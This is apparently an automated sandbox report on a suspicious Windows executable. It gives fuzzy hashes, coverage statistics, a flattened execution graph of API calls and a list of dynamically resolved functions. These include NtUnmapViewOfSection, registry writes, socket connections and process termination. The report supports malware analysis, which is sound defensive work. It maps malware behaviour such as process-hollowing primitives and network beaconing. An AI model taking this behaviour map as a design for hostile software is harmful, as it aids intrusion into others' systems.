                                                                              • Opcode Fuzzy Hash: e6aa7fe544a38f53a83825cf0be41a03a1b6a015fbf9ace0387fdff847dd38cd
                                                                              • Instruction Fuzzy Hash: AD01D461A4E3950FC72B122918205656FBA9FD3A1072A45DBC081DF39BCD954C4E87B3

                                                                              Execution Graph

                                                                              Execution Coverage: 2.9%
                                                                              Dynamic/Decrypted Code Coverage: 0%
                                                                              Signature Coverage: 6.2%
                                                                              Total number of Nodes: 981
                                                                              Total number of Limit Nodes: 43
3 library calls 45909->46397 45911 40de71 45914 401d64 28 API calls 45911->45914 45913 40deb1 45912->45913 45916 40def9 45913->45916 45917 40debd 45913->45917 45915 40de84 45914->45915 45918 40de8b CreateThread 45915->45918 45920 401d64 28 API calls 45916->45920 46398 43360d 22 API calls 3 library calls 45917->46398 45918->45908 46807 419128 102 API calls __EH_prolog 45918->46807 45922 40df02 45920->45922 45921 40dec6 45923 401d64 28 API calls 45921->45923 45925 40df6c 45922->45925 45926 40df0e 45922->45926 45924 40ded8 45923->45924 45928 40dedf CreateThread 45924->45928 45929 401d64 28 API calls 45925->45929 45927 401d64 28 API calls 45926->45927 45931 40df1e 45927->45931 45928->45916 46806 419128 102 API calls __EH_prolog 45928->46806 45930 40df75 45929->45930 45932 40df81 45930->45932 45933 40dfba 45930->45933 45934 401d64 28 API calls 45931->45934 45936 401d64 28 API calls 45932->45936 46203 41a7a2 GetComputerNameExW GetUserNameW 45933->46203 45937 40df33 45934->45937 45939 40df8a 45936->45939 46399 40c854 31 API calls 45937->46399 45944 401d64 28 API calls 45939->45944 45940 401e18 26 API calls 45941 40dfce 45940->45941 45943 401e13 26 API calls 45941->45943 45946 40dfd7 45943->45946 45947 40df9f 45944->45947 45945 40df46 45948 401e18 26 API calls 45945->45948 45949 40dfe0 SetProcessDEPPolicy 45946->45949 45950 40dfe3 CreateThread 45946->45950 45957 43a5e7 42 API calls 45947->45957 45951 40df52 45948->45951 45949->45950 45952 40e004 45950->45952 45953 40dff8 CreateThread 45950->45953 46775 40e54f 45950->46775 45954 401e13 26 API calls 45951->45954 45955 40e019 45952->45955 45956 40e00d CreateThread 45952->45956 45953->45952 46802 410f36 136 API calls 45953->46802 45958 40df5b CreateThread 45954->45958 45960 40e073 45955->45960 45962 401f66 28 API calls 45955->45962 45956->45955 46804 411524 38 API calls ___scrt_fastfail 45956->46804 45959 40dfac 45957->45959 45958->45925 46805 40196b 49 API calls 45958->46805 46400 40b95c 7 API calls 45959->46400 46214 41246e 
RegOpenKeyExA 45960->46214 45963 40e046 45962->45963 46401 404c9e 28 API calls 45963->46401 45966 40e053 45968 401f66 28 API calls 45966->45968 45970 40e062 45968->45970 45969 40e12a 46226 40cbac 45969->46226 45974 41a686 79 API calls 45970->45974 45972 41ae08 28 API calls 45973 40e0a4 45972->45973 46217 412584 RegOpenKeyExW 45973->46217 45976 40e067 45974->45976 45978 401eea 26 API calls 45976->45978 45978->45960 45981 401e13 26 API calls 45984 40e0c5 45981->45984 45982 40e0ed DeleteFileW 45983 40e0f4 45982->45983 45982->45984 45986 41ae08 28 API calls 45983->45986 45984->45982 45984->45983 45985 40e0db Sleep 45984->45985 46402 401e07 45985->46402 45988 40e104 45986->45988 46222 41297a RegOpenKeyExW 45988->46222 45990 40e117 45991 401e13 26 API calls 45990->45991 45992 40e121 45991->45992 45993 401e13 26 API calls 45992->45993 45993->45969 45994->45680 45995->45687 45996->45684 45997->45694 45998->45696 45999->45699 46000->45674 46001->45677 46002->45681 46003->45703 46004->45705 46005->45708 46006->45710 46008 433c71 GetStartupInfoW 46007->46008 46008->45714 46010 44dddb 46009->46010 46011 44ddd2 46009->46011 46010->45717 46014 44dcc8 51 API calls 4 library calls 46011->46014 46013->45717 46014->46010 46016 41bd22 LoadLibraryA GetProcAddress 46015->46016 46017 41bd12 GetModuleHandleA GetProcAddress 46015->46017 46018 41bd4b 32 API calls 46016->46018 46019 41bd3b LoadLibraryA GetProcAddress 46016->46019 46017->46016 46018->45722 46019->46018 46406 41a63f FindResourceA 46020->46406 46024 40e192 _Yarn 46418 401f86 46024->46418 46027 401eef 26 API calls 46028 40e1b8 46027->46028 46029 401eea 26 API calls 46028->46029 46030 40e1c1 46029->46030 46031 43a88c ___std_exception_copy 21 API calls 46030->46031 46032 40e1d2 _Yarn 46031->46032 46422 406052 46032->46422 46034 40e205 46034->45724 46036 401fcc 46035->46036 46432 402501 46036->46432 46038 401fea 46038->45727 46040 41afd6 46039->46040 46044 41b048 46040->46044 46050 401eef 26 API calls 46040->46050 46055 401eea 26 
API calls 46040->46055 46059 41b046 46040->46059 46437 403b60 28 API calls 46040->46437 46438 41bfa9 28 API calls 46040->46438 46041 401eea 26 API calls 46042 41b078 46041->46042 46043 401eea 26 API calls 46042->46043 46045 41b080 46043->46045 46439 403b60 28 API calls 46044->46439 46048 401eea 26 API calls 46045->46048 46051 40d7c6 46048->46051 46049 41b054 46052 401eef 26 API calls 46049->46052 46050->46040 46060 40e8bd 46051->46060 46053 41b05d 46052->46053 46054 401eea 26 API calls 46053->46054 46056 41b065 46054->46056 46055->46040 46440 41bfa9 28 API calls 46056->46440 46059->46041 46061 40e8ca 46060->46061 46063 40e8da 46061->46063 46441 40200a 26 API calls 46061->46441 46063->45732 46065 40200a 46064->46065 46069 40203a 46065->46069 46442 402654 26 API calls 46065->46442 46067 40202b 46443 4026ba 26 API calls _Deallocate 46067->46443 46069->45734 46071 401d6c 46070->46071 46072 401d74 46071->46072 46444 401fff 28 API calls 46071->46444 46072->45739 46076 404ccb 46075->46076 46445 402e78 46076->46445 46078 404cee 46078->45746 46454 404bc4 46079->46454 46081 405cf4 46081->45750 46083 401efe 46082->46083 46085 401f0a 46083->46085 46463 4021b9 26 API calls 46083->46463 46085->45753 46087 4021b9 46086->46087 46088 4021e8 46087->46088 46464 40262e 26 API calls _Deallocate 46087->46464 46088->45755 46092 401ec9 46090->46092 46091 401ee4 46091->45763 46092->46091 46093 402325 28 API calls 46092->46093 46093->46091 46465 401e8f 46094->46465 46096 40bee1 CreateMutexA GetLastError 46096->45779 46467 41b15b 46097->46467 46102 401eef 26 API calls 46103 41a49f 46102->46103 46104 401eea 26 API calls 46103->46104 46105 41a4a7 46104->46105 46106 41a4fa 46105->46106 46107 412513 31 API calls 46105->46107 46106->45784 46108 41a4cd 46107->46108 46109 41a4d8 StrToIntA 46108->46109 46110 41a4ef 46109->46110 46111 41a4e6 46109->46111 46113 401eea 26 API calls 46110->46113 46475 41c102 28 API calls 46111->46475 46113->46106 46115 40698f 46114->46115 46116 4124b7 3 API calls 
46115->46116 46117 406996 46116->46117 46117->45796 46117->45797 46119 41ae1c 46118->46119 46476 40b027 46119->46476 46121 41ae24 46121->45810 46123 401e27 46122->46123 46125 401e33 46123->46125 46485 402121 26 API calls 46123->46485 46125->45813 46128 402121 46126->46128 46127 402150 46127->45816 46128->46127 46486 402718 26 API calls _Deallocate 46128->46486 46131 4128c0 46130->46131 46132 406052 28 API calls 46131->46132 46133 4128d5 46132->46133 46134 401fbd 28 API calls 46133->46134 46135 4128e5 46134->46135 46136 4126d2 29 API calls 46135->46136 46137 4128ef 46136->46137 46138 401eea 26 API calls 46137->46138 46139 4128fc 46138->46139 46139->45860 46141 401f6e 46140->46141 46487 402301 46141->46487 46145 412722 46144->46145 46148 4126eb 46144->46148 46146 401eea 26 API calls 46145->46146 46147 40dd3b 46146->46147 46147->45863 46149 4126fd RegSetValueExA RegCloseKey 46148->46149 46149->46145 46151 43a600 _swprintf 46150->46151 46491 43993e 46151->46491 46155 41a737 46154->46155 46156 41a69c GetLocalTime 46154->46156 46158 401eea 26 API calls 46155->46158 46157 404cbf 28 API calls 46156->46157 46159 41a6de 46157->46159 46160 41a73f 46158->46160 46161 405ce6 28 API calls 46159->46161 46162 401eea 26 API calls 46160->46162 46163 41a6ea 46161->46163 46164 40ddaa 46162->46164 46525 4027cb 46163->46525 46164->45887 46166 41a6f6 46167 405ce6 28 API calls 46166->46167 46168 41a702 46167->46168 46528 406478 76 API calls 46168->46528 46170 41a710 46171 401eea 26 API calls 46170->46171 46172 41a71c 46171->46172 46173 401eea 26 API calls 46172->46173 46174 41a725 46173->46174 46175 401eea 26 API calls 46174->46175 46176 41a72e 46175->46176 46177 401eea 26 API calls 46176->46177 46177->46155 46179 409536 _wcslen 46178->46179 46180 409541 46179->46180 46181 409558 46179->46181 46183 40c89e 31 API calls 46180->46183 46182 40c89e 31 API calls 46181->46182 46184 409560 46182->46184 46185 409549 46183->46185 46187 401e18 26 API calls 46184->46187 46186 401e18 26 API calls 
46185->46186 46202 409553 46186->46202 46188 40956e 46187->46188 46189 401e13 26 API calls 46188->46189 46191 409576 46189->46191 46190 401e13 26 API calls 46192 4095ad 46190->46192 46548 40856b 28 API calls 46191->46548 46533 409837 46192->46533 46195 409588 46549 4028cf 46195->46549 46198 409593 46199 401e18 26 API calls 46198->46199 46200 40959d 46199->46200 46201 401e13 26 API calls 46200->46201 46201->46202 46202->46190 46568 403b40 46203->46568 46207 41a7fd 46208 4028cf 28 API calls 46207->46208 46209 41a807 46208->46209 46210 401e13 26 API calls 46209->46210 46211 41a810 46210->46211 46212 401e13 26 API calls 46211->46212 46213 40dfc3 46212->46213 46213->45940 46215 40e08b 46214->46215 46216 41248f RegQueryValueExA RegCloseKey 46214->46216 46215->45969 46215->45972 46216->46215 46218 4125b0 RegQueryValueExW RegCloseKey 46217->46218 46219 4125dd 46217->46219 46218->46219 46220 403b40 28 API calls 46219->46220 46221 40e0ba 46220->46221 46221->45981 46223 412992 RegDeleteValueW 46222->46223 46224 4129a6 46222->46224 46223->46224 46225 4129a2 46223->46225 46224->45990 46225->45990 46227 40cbc5 46226->46227 46228 41246e 3 API calls 46227->46228 46229 40cbcc 46228->46229 46233 40cbeb 46229->46233 46601 401602 46229->46601 46231 40cbd9 46604 4127d5 RegCreateKeyA 46231->46604 46234 413fd4 46233->46234 46235 413feb 46234->46235 46621 41aa73 46235->46621 46237 413ff6 46238 401d64 28 API calls 46237->46238 46239 41400f 46238->46239 46240 43a5e7 42 API calls 46239->46240 46241 41401c 46240->46241 46242 414021 Sleep 46241->46242 46243 41402e 46241->46243 46242->46243 46244 401f66 28 API calls 46243->46244 46245 41403d 46244->46245 46246 401d64 28 API calls 46245->46246 46247 41404b 46246->46247 46248 401fbd 28 API calls 46247->46248 46249 414053 46248->46249 46250 41afc3 28 API calls 46249->46250 46251 41405b 46250->46251 46625 404262 WSAStartup 46251->46625 46253 414065 46254 401d64 28 API calls 46253->46254 46255 41406e 46254->46255 46256 401d64 28 API calls 
46255->46256 46296 4140ed 46255->46296 46257 414087 46256->46257 46260 401d64 28 API calls 46257->46260 46258 401d64 28 API calls 46258->46296 46259 401fbd 28 API calls 46259->46296 46261 414098 46260->46261 46263 401d64 28 API calls 46261->46263 46262 41afc3 28 API calls 46262->46296 46264 4140a9 46263->46264 46266 401d64 28 API calls 46264->46266 46265 4085b4 28 API calls 46265->46296 46267 4140ba 46266->46267 46269 401d64 28 API calls 46267->46269 46268 401eef 26 API calls 46268->46296 46270 4140cb 46269->46270 46272 401d64 28 API calls 46270->46272 46271 401eea 26 API calls 46271->46296 46273 4140dd 46272->46273 46727 404101 87 API calls 46273->46727 46276 414244 WSAGetLastError 46728 41bc76 30 API calls 46276->46728 46282 41a686 79 API calls 46282->46296 46284 404cbf 28 API calls 46284->46296 46285 401d8c 26 API calls 46285->46296 46286 43a5e7 42 API calls 46288 414b80 Sleep 46286->46288 46287 405ce6 28 API calls 46287->46296 46288->46296 46289 4027cb 28 API calls 46289->46296 46290 401f66 28 API calls 46290->46296 46295 412513 31 API calls 46295->46296 46296->46258 46296->46259 46296->46262 46296->46265 46296->46268 46296->46271 46296->46276 46296->46282 46296->46284 46296->46285 46296->46286 46296->46287 46296->46289 46296->46290 46296->46295 46313 41446f 46296->46313 46626 413f9a 46296->46626 46631 4041f1 46296->46631 46638 404915 46296->46638 46653 40428c connect 46296->46653 46713 4047eb WaitForSingleObject 46296->46713 46729 404c9e 28 API calls 46296->46729 46730 413683 50 API calls 46296->46730 46731 4082dc 28 API calls 46296->46731 46732 440c51 26 API calls 46296->46732 46733 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46296->46733 46297 403b40 28 API calls 46297->46313 46300 401d64 28 API calls 46301 4144ed GetTickCount 46300->46301 46736 41ad46 28 API calls 46301->46736 46304 41ad46 28 API calls 46304->46313 46307 41aec8 28 API calls 46307->46313 46309 40275c 28 API calls 46309->46313 46310 405ce6 28 API calls 46310->46313 46311 4027cb 28 API 
calls 46311->46313 46313->46296 46313->46297 46313->46300 46313->46304 46313->46307 46313->46309 46313->46310 46313->46311 46314 401eea 26 API calls 46313->46314 46315 401e13 26 API calls 46313->46315 46318 401f66 28 API calls 46313->46318 46319 41a686 79 API calls 46313->46319 46320 414b22 CreateThread 46313->46320 46734 40cbf1 6 API calls 46313->46734 46735 41adee 28 API calls 46313->46735 46737 41aca0 GetTickCount 46313->46737 46738 41ac52 30 API calls ___scrt_fastfail 46313->46738 46739 40e679 29 API calls 46313->46739 46740 4027ec 28 API calls 46313->46740 46741 404468 59 API calls _Yarn 46313->46741 46742 4045d5 111 API calls ___std_exception_copy 46313->46742 46743 40a767 84 API calls 46313->46743 46314->46313 46315->46313 46318->46313 46319->46313 46320->46313 46768 419e89 102 API calls 46320->46768 46321->45740 46322->45749 46325 4085c0 46324->46325 46326 402e78 28 API calls 46325->46326 46327 4085e4 46326->46327 46327->45771 46329 4124e1 RegQueryValueExA RegCloseKey 46328->46329 46330 41250b 46328->46330 46329->46330 46330->45767 46331->45774 46332->45803 46333->45797 46334->45787 46335->45801 46337 40c8ba 46336->46337 46338 40c8da 46337->46338 46339 40c90f 46337->46339 46343 40c8d0 46337->46343 46769 41a74b 29 API calls 46338->46769 46342 41b15b GetCurrentProcess 46339->46342 46341 40ca03 GetLongPathNameW 46345 403b40 28 API calls 46341->46345 46346 40c914 46342->46346 46343->46341 46344 40c8e3 46347 401e18 26 API calls 46344->46347 46348 40ca18 46345->46348 46349 40c918 46346->46349 46350 40c96a 46346->46350 46352 40c8ed 46347->46352 46353 403b40 28 API calls 46348->46353 46351 403b40 28 API calls 46349->46351 46354 403b40 28 API calls 46350->46354 46356 40c926 46351->46356 46358 401e13 26 API calls 46352->46358 46357 40ca27 46353->46357 46355 40c978 46354->46355 46362 403b40 28 API calls 46355->46362 46363 403b40 28 API calls 46356->46363 46772 40cc37 28 API calls 46357->46772 46358->46343 46360 40ca3a 46773 402860 28 API calls 46360->46773 46365 
40c98e 46362->46365 46366 40c93c 46363->46366 46364 40ca45 46774 402860 28 API calls 46364->46774 46771 402860 28 API calls 46365->46771 46770 402860 28 API calls 46366->46770 46370 40ca4f 46373 401e13 26 API calls 46370->46373 46371 40c999 46374 401e18 26 API calls 46371->46374 46372 40c947 46375 401e18 26 API calls 46372->46375 46376 40ca59 46373->46376 46377 40c9a4 46374->46377 46378 40c952 46375->46378 46379 401e13 26 API calls 46376->46379 46380 401e13 26 API calls 46377->46380 46381 401e13 26 API calls 46378->46381 46382 40ca62 46379->46382 46383 40c9ad 46380->46383 46384 40c95b 46381->46384 46385 401e13 26 API calls 46382->46385 46386 401e13 26 API calls 46383->46386 46387 401e13 26 API calls 46384->46387 46388 40ca6b 46385->46388 46386->46352 46387->46352 46389 401e13 26 API calls 46388->46389 46390 40ca74 46389->46390 46391 401e13 26 API calls 46390->46391 46392 40ca7d 46391->46392 46392->45849 46393->45861 46394->45882 46395->45842 46396->45875 46397->45911 46398->45921 46399->45945 46400->45933 46401->45966 46403 401e0c 46402->46403 46404->45794 46407 40e183 46406->46407 46408 41a65c LoadResource LockResource SizeofResource 46406->46408 46409 43a88c 46407->46409 46408->46407 46410 446aff 46409->46410 46411 446b3d 46410->46411 46412 446b28 HeapAlloc 46410->46412 46416 446b11 _strftime 46410->46416 46426 445354 20 API calls __dosmaperr 46411->46426 46414 446b3b 46412->46414 46412->46416 46415 446b42 46414->46415 46415->46024 46416->46411 46416->46412 46425 442200 7 API calls 2 library calls 46416->46425 46419 401f8e 46418->46419 46427 402325 46419->46427 46421 401fa4 46421->46027 46423 401f86 28 API calls 46422->46423 46424 406066 46423->46424 46424->46034 46425->46416 46426->46415 46428 40232f 46427->46428 46430 40233a 46428->46430 46431 40294a 28 API calls 46428->46431 46430->46421 46431->46430 46433 40250d 46432->46433 46434 40252b 46433->46434 46436 40261a 28 API calls 46433->46436 46434->46038 46436->46434 46437->46040 46438->46040 46439->46049 
46440->46059 46441->46063 46442->46067 46443->46069 46446 402e85 46445->46446 46447 402e98 46446->46447 46449 402ea9 46446->46449 46450 402eae 46446->46450 46452 403445 28 API calls 46447->46452 46449->46078 46450->46449 46453 40225b 26 API calls 46450->46453 46452->46449 46453->46449 46455 404bd0 46454->46455 46458 40245c 46455->46458 46457 404be4 46457->46081 46459 402469 46458->46459 46461 402478 46459->46461 46462 402ad3 28 API calls 46459->46462 46461->46457 46462->46461 46463->46085 46464->46088 46466 401e94 46465->46466 46468 41a471 46467->46468 46469 41b168 GetCurrentProcess 46467->46469 46470 412513 RegOpenKeyExA 46468->46470 46469->46468 46471 412541 RegQueryValueExA RegCloseKey 46470->46471 46472 412569 46470->46472 46471->46472 46473 401f66 28 API calls 46472->46473 46474 41257e 46473->46474 46474->46102 46475->46110 46477 40b02f 46476->46477 46480 40b04b 46477->46480 46479 40b045 46479->46121 46481 40b055 46480->46481 46483 40b060 46481->46483 46484 40b138 28 API calls 46481->46484 46483->46479 46484->46483 46485->46125 46486->46127 46488 40230d 46487->46488 46489 402325 28 API calls 46488->46489 46490 401f80 46489->46490 46490->45854 46509 43a545 46491->46509 46493 43998b 46518 4392de 38 API calls 3 library calls 46493->46518 46495 439950 46495->46493 46496 439965 46495->46496 46508 40dd54 46495->46508 46516 445354 20 API calls __dosmaperr 46496->46516 46498 43996a 46517 43a827 26 API calls _Deallocate 46498->46517 46501 439997 46502 4399c6 46501->46502 46519 43a58a 42 API calls __Toupper 46501->46519 46503 439a32 46502->46503 46520 43a4f1 26 API calls 2 library calls 46502->46520 46521 43a4f1 26 API calls 2 library calls 46503->46521 46506 439af9 _swprintf 46506->46508 46522 445354 20 API calls __dosmaperr 46506->46522 46508->45869 46508->45871 46510 43a54a 46509->46510 46511 43a55d 46509->46511 46523 445354 20 API calls __dosmaperr 46510->46523 46511->46495 46513 43a54f 46524 43a827 26 API calls _Deallocate 46513->46524 46515 43a55a 46515->46495 
46516->46498 46517->46508 46518->46501 46519->46501 46520->46503 46521->46506 46522->46508 46523->46513 46524->46515 46529 401e9b 46525->46529 46527 4027d9 46527->46166 46528->46170 46530 401ea7 46529->46530 46531 40245c 28 API calls 46530->46531 46532 401eb9 46531->46532 46532->46527 46534 409855 46533->46534 46535 4124b7 3 API calls 46534->46535 46536 40985c 46535->46536 46537 409870 46536->46537 46538 40988a 46536->46538 46539 4095cf 46537->46539 46540 409875 46537->46540 46554 4082dc 28 API calls 46538->46554 46539->45906 46552 4082dc 28 API calls 46540->46552 46543 409898 46555 4098a5 85 API calls 46543->46555 46544 409883 46553 409959 29 API calls 46544->46553 46547 409888 46547->46539 46548->46195 46559 402d8b 46549->46559 46551 4028dd 46551->46198 46552->46544 46553->46547 46556 40999f 129 API calls 46553->46556 46554->46543 46555->46539 46557 4099b5 52 API calls 46555->46557 46558 4099a9 124 API calls 46555->46558 46560 402d97 46559->46560 46563 4030f7 46560->46563 46562 402dab 46562->46551 46564 403101 46563->46564 46566 403115 46564->46566 46567 4036c2 28 API calls 46564->46567 46566->46562 46567->46566 46569 403b48 46568->46569 46575 403b7a 46569->46575 46572 403cbb 46584 403dc2 46572->46584 46574 403cc9 46574->46207 46576 403b86 46575->46576 46579 403b9e 46576->46579 46578 403b5a 46578->46572 46580 403ba8 46579->46580 46582 403bb3 46580->46582 46583 403cfd 28 API calls 46580->46583 46582->46578 46583->46582 46585 403dce 46584->46585 46588 402ffd 46585->46588 46587 403de3 46587->46574 46589 40300e 46588->46589 46594 4032a4 46589->46594 46593 40302e 46593->46587 46595 4032b0 46594->46595 46596 40301a 46594->46596 46600 4032b6 28 API calls 46595->46600 46596->46593 46599 4035e8 28 API calls 46596->46599 46599->46593 46607 4395ba 46601->46607 46605 412814 46604->46605 46606 4127ed RegSetValueExA RegCloseKey 46604->46606 46605->46233 46606->46605 46610 43953b 46607->46610 46609 401608 46609->46231 46611 43954a 46610->46611 46613 43955e 46610->46613 46618 
445354 20 API calls __dosmaperr 46611->46618 46616 43955a __alldvrm 46613->46616 46620 447601 11 API calls 2 library calls 46613->46620 46615 43954f 46619 43a827 26 API calls _Deallocate 46615->46619 46616->46609 46618->46615 46619->46616 46620->46616 46622 41aab9 _Yarn ___scrt_fastfail 46621->46622 46623 401f66 28 API calls 46622->46623 46624 41ab2e 46623->46624 46624->46237 46625->46253 46627 413fb3 getaddrinfo WSASetLastError 46626->46627 46628 413fa9 46626->46628 46627->46296 46744 413e37 35 API calls ___std_exception_copy 46628->46744 46630 413fae 46630->46627 46632 404206 socket 46631->46632 46633 4041fd 46631->46633 46635 404220 46632->46635 46636 404224 CreateEventW 46632->46636 46745 404262 WSAStartup 46633->46745 46635->46296 46636->46296 46637 404202 46637->46632 46637->46635 46639 4049b1 46638->46639 46641 40492a 46638->46641 46639->46296 46640 404933 46642 404987 CreateEventA CreateThread 46640->46642 46641->46640 46641->46642 46643 404942 GetLocalTime 46641->46643 46642->46639 46748 404b1d 46642->46748 46746 41ad46 28 API calls 46643->46746 46645 40495b 46747 404c9e 28 API calls 46645->46747 46647 404968 46648 401f66 28 API calls 46647->46648 46649 404977 46648->46649 46650 41a686 79 API calls 46649->46650 46651 40497c 46650->46651 46652 401eea 26 API calls 46651->46652 46652->46642 46654 4043e1 46653->46654 46655 4042b3 46653->46655 46656 4043e7 WSAGetLastError 46654->46656 46657 404343 46654->46657 46655->46657 46659 404cbf 28 API calls 46655->46659 46677 4042e8 46655->46677 46656->46657 46658 4043f7 46656->46658 46657->46296 46660 4042f7 46658->46660 46661 4043fc 46658->46661 46663 4042d4 46659->46663 46666 401f66 28 API calls 46660->46666 46763 41bc76 30 API calls 46661->46763 46667 401f66 28 API calls 46663->46667 46665 4042f0 46665->46660 46672 404306 46665->46672 46669 404448 46666->46669 46670 4042e3 46667->46670 46668 40440b 46764 404c9e 28 API calls 46668->46764 46673 401f66 28 API calls 46669->46673 46674 41a686 79 API calls 46670->46674 
46679 404315 46672->46679 46680 40434c 46672->46680 46676 404457 46673->46676 46674->46677 46675 404418 46678 401f66 28 API calls 46675->46678 46681 41a686 79 API calls 46676->46681 46752 420151 27 API calls 46677->46752 46682 404427 46678->46682 46684 401f66 28 API calls 46679->46684 46760 420f34 55 API calls 46680->46760 46681->46657 46686 41a686 79 API calls 46682->46686 46685 404324 46684->46685 46688 401f66 28 API calls 46685->46688 46689 40442c 46686->46689 46687 404354 46690 404389 46687->46690 46691 404359 46687->46691 46692 404333 46688->46692 46694 401eea 26 API calls 46689->46694 46762 4202ea 28 API calls 46690->46762 46695 401f66 28 API calls 46691->46695 46696 41a686 79 API calls 46692->46696 46694->46657 46698 404368 46695->46698 46699 404338 46696->46699 46697 404391 46700 4043be CreateEventW CreateEventW 46697->46700 46702 401f66 28 API calls 46697->46702 46701 401f66 28 API calls 46698->46701 46753 420191 46699->46753 46700->46657 46703 404377 46701->46703 46706 4043a7 46702->46706 46704 41a686 79 API calls 46703->46704 46707 40437c 46704->46707 46708 401f66 28 API calls 46706->46708 46761 420592 53 API calls 46707->46761 46710 4043b6 46708->46710 46711 41a686 79 API calls 46710->46711 46712 4043bb 46711->46712 46712->46700 46714 404805 SetEvent CloseHandle 46713->46714 46715 40481c closesocket 46713->46715 46716 40489c 46714->46716 46717 404829 46715->46717 46716->46296 46718 404838 46717->46718 46719 40483f 46717->46719 46767 404ab1 83 API calls 46718->46767 46721 404851 WaitForSingleObject 46719->46721 46722 404892 SetEvent CloseHandle 46719->46722 46723 420191 3 API calls 46721->46723 46722->46716 46724 404860 SetEvent WaitForSingleObject 46723->46724 46725 420191 3 API calls 46724->46725 46726 404878 SetEvent CloseHandle CloseHandle 46725->46726 46726->46722 46727->46296 46728->46296 46729->46296 46730->46296 46731->46296 46732->46296 46733->46296 46734->46313 46735->46313 46736->46313 46737->46313 46738->46313 46739->46313 46740->46313 
46741->46313 46742->46313 46743->46313 46744->46630 46745->46637 46746->46645 46747->46647 46751 404b29 101 API calls 46748->46751 46750 404b26 46751->46750 46752->46665 46754 41dc15 46753->46754 46755 420199 46753->46755 46756 41dc23 46754->46756 46765 41cd69 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46754->46765 46755->46657 46766 41d950 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 46756->46766 46759 41dc2a 46760->46687 46761->46699 46762->46697 46763->46668 46764->46675 46765->46756 46766->46759 46767->46719 46769->46344 46770->46372 46771->46371 46772->46360 46773->46364 46774->46370 46777 40e56a 46775->46777 46776 4124b7 3 API calls 46776->46777 46777->46776 46778 40e60e 46777->46778 46781 40e5fe Sleep 46777->46781 46785 40e59c 46777->46785 46811 4082dc 28 API calls 46778->46811 46781->46777 46782 41ae08 28 API calls 46782->46785 46783 40e619 46786 41ae08 28 API calls 46783->46786 46785->46781 46785->46782 46790 401e13 26 API calls 46785->46790 46793 401f66 28 API calls 46785->46793 46797 4126d2 29 API calls 46785->46797 46808 40bf04 73 API calls ___scrt_fastfail 46785->46808 46809 4082dc 28 API calls 46785->46809 46810 412774 29 API calls 46785->46810 46788 40e625 46786->46788 46812 412774 29 API calls 46788->46812 46790->46785 46791 40e638 46792 401e13 26 API calls 46791->46792 46794 40e644 46792->46794 46793->46785 46795 401f66 28 API calls 46794->46795 46796 40e655 46795->46796 46798 4126d2 29 API calls 46796->46798 46797->46785 46799 40e668 46798->46799 46813 411699 TerminateProcess WaitForSingleObject 46799->46813 46801 40e670 ExitProcess 46814 411637 60 API calls 46802->46814 46809->46785 46810->46785 46811->46783 46812->46791 46813->46801

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63

Strings

Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Joe Sandbox IDA Plugin
